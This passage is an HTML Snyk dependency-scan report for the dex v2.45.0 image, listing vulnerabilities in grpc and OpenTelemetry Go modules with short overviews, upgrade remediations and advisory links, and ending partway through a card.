mirror of
https://github.com/argoproj/argo-cd
synced 2026-04-21 17:07:16 +00:00
4659 lines
218 KiB
HTML
4659 lines
218 KiB
HTML
<!DOCTYPE html>
|
||
<html lang="en">
|
||
|
||
<head>
|
||
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
|
||
<meta http-equiv="Content-Language" content="en-us">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
||
<title>Snyk test report</title>
|
||
<meta name="description" content="43 known vulnerabilities found in 126 vulnerable dependency paths.">
|
||
<base target="_blank">
|
||
<link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
|
||
sizes="194x194">
|
||
<link rel="shortcut icon" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.ico">
|
||
<style type="text/css">
|
||
|
||
body {
|
||
-moz-font-feature-settings: "pnum";
|
||
-webkit-font-feature-settings: "pnum";
|
||
font-variant-numeric: proportional-nums;
|
||
display: flex;
|
||
flex-direction: column;
|
||
font-feature-settings: "pnum";
|
||
font-size: 100%;
|
||
line-height: 1.5;
|
||
min-height: 100vh;
|
||
-webkit-text-size-adjust: 100%;
|
||
margin: 0;
|
||
padding: 0;
|
||
background-color: #F5F5F5;
|
||
font-family: 'Arial', 'Helvetica', Calibri, sans-serif;
|
||
}
|
||
|
||
h1,
|
||
h2,
|
||
h3,
|
||
h4,
|
||
h5,
|
||
h6 {
|
||
font-weight: 500;
|
||
}
|
||
|
||
a,
|
||
a:link,
|
||
a:visited {
|
||
border-bottom: 1px solid #4b45a9;
|
||
text-decoration: none;
|
||
color: #4b45a9;
|
||
}
|
||
|
||
a:hover,
|
||
a:focus,
|
||
a:active {
|
||
border-bottom: 1px solid #4b45a9;
|
||
}
|
||
|
||
hr {
|
||
border: none;
|
||
margin: 1em 0;
|
||
border-top: 1px solid #c5c5c5;
|
||
}
|
||
|
||
ul {
|
||
padding: 0 1em;
|
||
margin: 1em 0;
|
||
}
|
||
|
||
code {
|
||
background-color: #EEE;
|
||
color: #333;
|
||
padding: 0.25em 0.5em;
|
||
border-radius: 0.25em;
|
||
}
|
||
|
||
pre {
|
||
background-color: #333;
|
||
font-family: monospace;
|
||
padding: 0.5em 1em 0.75em;
|
||
border-radius: 0.25em;
|
||
font-size: 14px;
|
||
}
|
||
|
||
pre code {
|
||
padding: 0;
|
||
background-color: transparent;
|
||
color: #fff;
|
||
}
|
||
|
||
a code {
|
||
border-radius: .125rem .125rem 0 0;
|
||
padding-bottom: 0;
|
||
color: #4b45a9;
|
||
}
|
||
|
||
a[href^="http://"]:after,
|
||
a[href^="https://"]:after {
|
||
background-image: linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20id%3D%22Page-1%22%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%20id%3D%22link-external%22%3E%3Cg%20id%3D%22arrow%22%3E%3Cpath%20id%3D%22Line%22%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20id%3D%22Triangle%22%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20id%3D%22square%22%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");
|
||
background-repeat: no-repeat;
|
||
background-size: .75rem;
|
||
content: "";
|
||
display: inline-block;
|
||
height: .75rem;
|
||
margin-left: .25rem;
|
||
width: .75rem;
|
||
}
|
||
|
||
|
||
/* Layout */
|
||
|
||
[class*=layout-container] {
|
||
margin: 0 auto;
|
||
max-width: 71.25em;
|
||
padding: 1.9em 1.3em;
|
||
position: relative;
|
||
}
|
||
.layout-container--short {
|
||
padding-top: 0;
|
||
padding-bottom: 0;
|
||
max-width: 48.75em;
|
||
}
|
||
|
||
.layout-container--short:after {
|
||
display: block;
|
||
content: "";
|
||
clear: both;
|
||
}
|
||
|
||
/* Header */
|
||
|
||
.header {
|
||
padding-bottom: 1px;
|
||
}
|
||
|
||
.paths {
|
||
margin-left: 8px;
|
||
}
|
||
.header-wrap {
|
||
display: flex;
|
||
flex-direction: row;
|
||
justify-content: space-between;
|
||
padding-top: 2em;
|
||
}
|
||
.project__header {
|
||
background-color: #030328;
|
||
color: #fff;
|
||
margin-bottom: -1px;
|
||
padding-top: 1em;
|
||
padding-bottom: 0.25em;
|
||
border-bottom: 2px solid #BBB;
|
||
}
|
||
|
||
.project__header__title {
|
||
overflow-wrap: break-word;
|
||
word-wrap: break-word;
|
||
word-break: break-all;
|
||
margin-bottom: .1em;
|
||
margin-top: 0;
|
||
}
|
||
|
||
.timestamp {
|
||
float: right;
|
||
clear: none;
|
||
margin-bottom: 0;
|
||
}
|
||
|
||
.meta-counts {
|
||
clear: both;
|
||
display: block;
|
||
flex-wrap: wrap;
|
||
justify-content: space-between;
|
||
margin: 0 0 1.5em;
|
||
color: #fff;
|
||
clear: both;
|
||
font-size: 1.1em;
|
||
}
|
||
|
||
.meta-count {
|
||
display: block;
|
||
flex-basis: 100%;
|
||
margin: 0 1em 1em 0;
|
||
float: left;
|
||
padding-right: 1em;
|
||
border-right: 2px solid #fff;
|
||
}
|
||
|
||
.meta-count:last-child {
|
||
border-right: 0;
|
||
padding-right: 0;
|
||
margin-right: 0;
|
||
}
|
||
|
||
/* Card */
|
||
|
||
.card {
|
||
background-color: #fff;
|
||
border: 1px solid #c5c5c5;
|
||
border-radius: .25rem;
|
||
margin: 0 0 2em 0;
|
||
position: relative;
|
||
min-height: 40px;
|
||
padding: 1.5em;
|
||
}
|
||
|
||
.card__labels {
|
||
position: absolute;
|
||
top: 1.1em;
|
||
left: 0;
|
||
display: flex;
|
||
align-items: center;
|
||
gap: 8px;
|
||
}
|
||
|
||
.card .label {
|
||
background-color: #767676;
|
||
border: 2px solid #767676;
|
||
color: white;
|
||
padding: 0.25rem 0.75rem;
|
||
font-size: 0.875rem;
|
||
text-transform: uppercase;
|
||
display: inline-block;
|
||
margin: 0;
|
||
border-radius: 0.25rem;
|
||
}
|
||
|
||
.card .label__text {
|
||
vertical-align: text-top;
|
||
font-weight: bold;
|
||
}
|
||
|
||
.card .label--critical {
|
||
background-color: #AB1A1A;
|
||
border-color: #AB1A1A;
|
||
}
|
||
|
||
.card .label--high {
|
||
background-color: #CE5019;
|
||
border-color: #CE5019;
|
||
}
|
||
|
||
.card .label--medium {
|
||
background-color: #D68000;
|
||
border-color: #D68000;
|
||
}
|
||
|
||
.card .label--low {
|
||
background-color: #88879E;
|
||
border-color: #88879E;
|
||
}
|
||
|
||
.card .label--exploit {
|
||
background-color: #8B5A96;
|
||
border-color: #8B5A96;
|
||
}
|
||
|
||
.severity--low {
|
||
border-color: #88879E;
|
||
}
|
||
|
||
.severity--medium {
|
||
border-color: #D68000;
|
||
}
|
||
|
||
.severity--high {
|
||
border-color: #CE5019;
|
||
}
|
||
|
||
.severity--critical {
|
||
border-color: #AB1A1A;
|
||
}
|
||
|
||
.card--vuln {
|
||
padding-top: 4em;
|
||
}
|
||
|
||
.card--vuln .card__labels > .label:first-child {
|
||
padding-left: 1.9em;
|
||
padding-right: 1.9em;
|
||
border-radius: 0 0.25rem 0.25rem 0;
|
||
}
|
||
|
||
.card--vuln .card__section h2 {
|
||
font-size: 22px;
|
||
margin-bottom: 0.5em;
|
||
}
|
||
|
||
.card--vuln .card__section p {
|
||
margin: 0 0 0.5em 0;
|
||
}
|
||
|
||
.card--vuln .card__meta {
|
||
padding: 0 0 0 1em;
|
||
margin: 0;
|
||
font-size: 1.1em;
|
||
}
|
||
|
||
.card .card__meta__paths {
|
||
font-size: 0.9em;
|
||
}
|
||
|
||
.card--vuln .card__title {
|
||
font-size: 28px;
|
||
margin-top: 0;
|
||
margin-right: 100px; /* Ensure space for the risk score */
|
||
}
|
||
|
||
.card--vuln .card__cta p {
|
||
margin: 0;
|
||
text-align: right;
|
||
}
|
||
|
||
.risk-score-display {
|
||
position: absolute;
|
||
top: 1.5em;
|
||
right: 1.5em;
|
||
text-align: right;
|
||
z-index: 10;
|
||
}
|
||
|
||
.risk-score-display__label {
|
||
font-size: 0.7em;
|
||
font-weight: bold;
|
||
color: #586069;
|
||
text-transform: uppercase;
|
||
line-height: 1;
|
||
margin-bottom: 3px;
|
||
}
|
||
|
||
.risk-score-display__value {
|
||
font-size: 1.9em;
|
||
font-weight: 600;
|
||
color: #24292e;
|
||
line-height: 1;
|
||
}
|
||
|
||
.source-panel {
|
||
clear: both;
|
||
display: flex;
|
||
justify-content: flex-start;
|
||
flex-direction: column;
|
||
align-items: flex-start;
|
||
padding: 0.5em 0;
|
||
width: fit-content;
|
||
}
|
||
|
||
|
||
|
||
</style>
|
||
<style type="text/css">
|
||
.metatable {
|
||
text-size-adjust: 100%;
|
||
-webkit-font-smoothing: antialiased;
|
||
-webkit-box-direction: normal;
|
||
color: inherit;
|
||
font-feature-settings: "pnum";
|
||
box-sizing: border-box;
|
||
background: transparent;
|
||
border: 0;
|
||
font: inherit;
|
||
font-size: 100%;
|
||
margin: 0;
|
||
outline: none;
|
||
padding: 0;
|
||
text-align: left;
|
||
text-decoration: none;
|
||
vertical-align: baseline;
|
||
z-index: auto;
|
||
margin-top: 12px;
|
||
border-collapse: collapse;
|
||
border-spacing: 0;
|
||
font-variant-numeric: tabular-nums;
|
||
max-width: 51.75em;
|
||
}
|
||
|
||
tbody {
|
||
text-size-adjust: 100%;
|
||
-webkit-font-smoothing: antialiased;
|
||
-webkit-box-direction: normal;
|
||
color: inherit;
|
||
font-feature-settings: "pnum";
|
||
border-collapse: collapse;
|
||
border-spacing: 0;
|
||
box-sizing: border-box;
|
||
background: transparent;
|
||
border: 0;
|
||
font: inherit;
|
||
font-size: 100%;
|
||
margin: 0;
|
||
outline: none;
|
||
padding: 0;
|
||
text-align: left;
|
||
text-decoration: none;
|
||
vertical-align: baseline;
|
||
z-index: auto;
|
||
display: flex;
|
||
flex-wrap: wrap;
|
||
}
|
||
|
||
.meta-row {
|
||
text-size-adjust: 100%;
|
||
-webkit-font-smoothing: antialiased;
|
||
-webkit-box-direction: normal;
|
||
color: inherit;
|
||
font-feature-settings: "pnum";
|
||
border-collapse: collapse;
|
||
border-spacing: 0;
|
||
box-sizing: border-box;
|
||
background: transparent;
|
||
border: 0;
|
||
font: inherit;
|
||
font-size: 100%;
|
||
outline: none;
|
||
text-align: left;
|
||
text-decoration: none;
|
||
vertical-align: baseline;
|
||
z-index: auto;
|
||
display: flex;
|
||
align-items: start;
|
||
border-top: 1px solid #d3d3d9;
|
||
padding: 8px 0 0 0;
|
||
border-bottom: none;
|
||
margin: 8px;
|
||
width: 47.75%;
|
||
}
|
||
|
||
.meta-row-label {
|
||
text-size-adjust: 100%;
|
||
-webkit-font-smoothing: antialiased;
|
||
-webkit-box-direction: normal;
|
||
font-feature-settings: "pnum";
|
||
border-collapse: collapse;
|
||
border-spacing: 0;
|
||
color: #4c4a73;
|
||
box-sizing: border-box;
|
||
background: transparent;
|
||
border: 0;
|
||
font: inherit;
|
||
margin: 0;
|
||
outline: none;
|
||
text-decoration: none;
|
||
z-index: auto;
|
||
align-self: start;
|
||
flex: 1;
|
||
font-size: 1rem;
|
||
line-height: 1.5rem;
|
||
padding: 0;
|
||
text-align: left;
|
||
vertical-align: top;
|
||
text-transform: none;
|
||
letter-spacing: 0;
|
||
}
|
||
|
||
.meta-row-value {
|
||
text-size-adjust: 100%;
|
||
-webkit-font-smoothing: antialiased;
|
||
-webkit-box-direction: normal;
|
||
color: inherit;
|
||
font-feature-settings: "pnum";
|
||
border-collapse: collapse;
|
||
border-spacing: 0;
|
||
word-break: break-word;
|
||
box-sizing: border-box;
|
||
background: transparent;
|
||
border: 0;
|
||
font: inherit;
|
||
font-size: 100%;
|
||
margin: 0;
|
||
outline: none;
|
||
padding: 0;
|
||
text-align: right;
|
||
text-decoration: none;
|
||
vertical-align: baseline;
|
||
z-index: auto;
|
||
}
|
||
</style>
|
||
</head>
|
||
|
||
<body class="section-projects">
|
||
<main class="layout-stacked">
|
||
<div class="layout-stacked__header header">
|
||
<header class="project__header">
|
||
<div class="layout-container">
|
||
<a class="brand" href="https://snyk.io" title="Snyk">
|
||
<svg width="68px" height="35px" viewBox="0 0 68 35" version="1.1" xmlns="http://www.w3.org/2000/svg" role="img">
|
||
<title>Snyk - Open Source Security</title>
|
||
<g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
|
||
<g fill="#fff">
|
||
<path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"></path>
|
||
</g>
|
||
</g>
|
||
</svg>
|
||
</a>
|
||
<div class="header-wrap">
|
||
<h1 class="project__header__title">Snyk test report</h1>
|
||
|
||
<p class="timestamp">April 19th 2026, 12:37:21 am (UTC+00:00)</p>
|
||
</div>
|
||
<div class="source-panel">
|
||
<span>Scanned the following paths:</span>
|
||
<ul>
|
||
<li class="paths">ghcr.io/dexidp/dex:v2.45.0/dexidp/dex (apk)</li>
|
||
<li class="paths">ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5//usr/local/bin/gomplate (gomodules)</li>
|
||
<li class="paths">ghcr.io/dexidp/dex:v2.45.0/dexidp/dex//usr/local/bin/docker-entrypoint (gomodules)</li>
|
||
<li class="paths">ghcr.io/dexidp/dex:v2.45.0/dexidp/dex//usr/local/bin/dex (gomodules)</li>
|
||
</ul>
|
||
</div>
|
||
|
||
<div class="meta-counts">
|
||
<div class="meta-count"><span>43</span> <span>known vulnerabilities</span></div>
|
||
<div class="meta-count"><span>126 vulnerable dependency paths</span></div>
|
||
<div class="meta-count"><span>1192</span> <span>dependencies</span></div>
|
||
</div><!-- .meta-counts -->
|
||
</div><!-- .layout-container--short -->
|
||
</header><!-- .project__header -->
|
||
</div><!-- .layout-stacked__header -->
|
||
|
||
<div class="layout-container" style="padding-top: 35px;">
|
||
<div class="cards--vuln filter--patch filter--ignore">
|
||
<div class="card card--vuln disclosure--not-new severity--critical" data-snyk-test="critical">
|
||
<h2 class="card__title">Incorrect Authorization</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--critical">
|
||
<span class="label__text">critical severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
google.golang.org/grpc
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and google.golang.org/grpc@v1.77.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
google.golang.org/grpc@v1.77.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
google.golang.org/grpc@v1.79.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
|
||
<h2 id="workaround">Workaround</h2>
|
||
<p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
|
||
<h2 class="card__title">Untrusted Search Path</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--high">
|
||
<span class="label__text">high severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
go.opentelemetry.io/otel/sdk/resource
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and go.opentelemetry.io/otel/sdk/resource@v1.39.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
go.opentelemetry.io/otel/sdk/resource@v1.39.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p>Affected versions of this package are vulnerable to Untrusted Search Path in resource detection code which executes <code>ioreg</code>, when the <code>PATH</code> environment variable is modified to include a malicious executable. An attacker can execute arbitrary code within the context of the application by placing a malicious binary earlier in the search path.</p>
|
||
<p><strong>Note:</strong> This vulnerability is only exploitable on MacOS/Darwin systems.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>go.opentelemetry.io/otel/sdk/resource</code> to version 1.40.0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/open-telemetry/opentelemetry-go/commit/d45961bcda453fcbdb6469c22d6e88a1f9970a53">GitHub Commit</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
|
||
<h2 class="card__title">Untrusted Search Path</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--high">
|
||
<span class="label__text">high severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
go.opentelemetry.io/otel/sdk/resource
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and go.opentelemetry.io/otel/sdk/resource@v1.39.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
go.opentelemetry.io/otel/sdk/resource@v1.39.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p>Affected versions of this package are vulnerable to Untrusted Search Path through the <code>hostIDReaderBSD.read</code> function in <code>sdk/resource/host_id.go</code>. An attacker can execute a malicious <code>kenv</code> binary by placing it earlier in <code>$PATH</code> and triggering host ID detection on BSD or Solaris systems when <code>/etc/hostid</code> is absent. When an application initializes OpenTelemetry resource detection under those conditions, it runs the attacker-controlled command in the application's context, allowing local code execution and compromising the process running the Go application.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>go.opentelemetry.io/otel/sdk/resource</code> to version 1.43.0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/open-telemetry/opentelemetry-go/commit/35214b60138eac8dec97a2d2b851d8c8471680c7">GitHub Commit</a></li>
|
||
<li><a href="http://github.com/open-telemetry/opentelemetry-go/releases/tag/v1.43.0">GitHub Release</a></li>
|
||
<li><a href="https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-hfvc-g4fc-pqhx">Maintainer's Advisory</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15954212">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
|
||
<h2 class="card__title">Allocation of Resources Without Limits or Throttling</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--high">
|
||
<span class="label__text">high severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Proof of Concept</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
go.opentelemetry.io/otel/propagation
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and go.opentelemetry.io/otel/propagation@v1.39.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
go.opentelemetry.io/otel/propagation@v1.39.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
go.opentelemetry.io/otel/propagation@v1.39.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p>Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the <code>baggage</code> header extraction process. An attacker can cause excessive CPU and memory allocations by sending numerous <code>baggage</code> header lines, even if each individual value remains within the allowed size limit.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>go.opentelemetry.io/otel/propagation</code> to version 1.41.0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-mh2q-q3fh-2475">GitHub Advisory</a></li>
|
||
<li><a href="https://github.com/open-telemetry/opentelemetry-go/commit/aa1894e09e3fe66860c7885cb40f98901b35277f">GitHub Commit</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELPROPAGATION-15928420">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
|
||
<h2 class="card__title">Allocation of Resources Without Limits or Throttling</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--high">
|
||
<span class="label__text">high severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Proof of Concept</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
go.opentelemetry.io/otel/internal/global
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and go.opentelemetry.io/otel/internal/global@v1.39.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
go.opentelemetry.io/otel/internal/global@v1.39.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
go.opentelemetry.io/otel/internal/global@v1.39.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
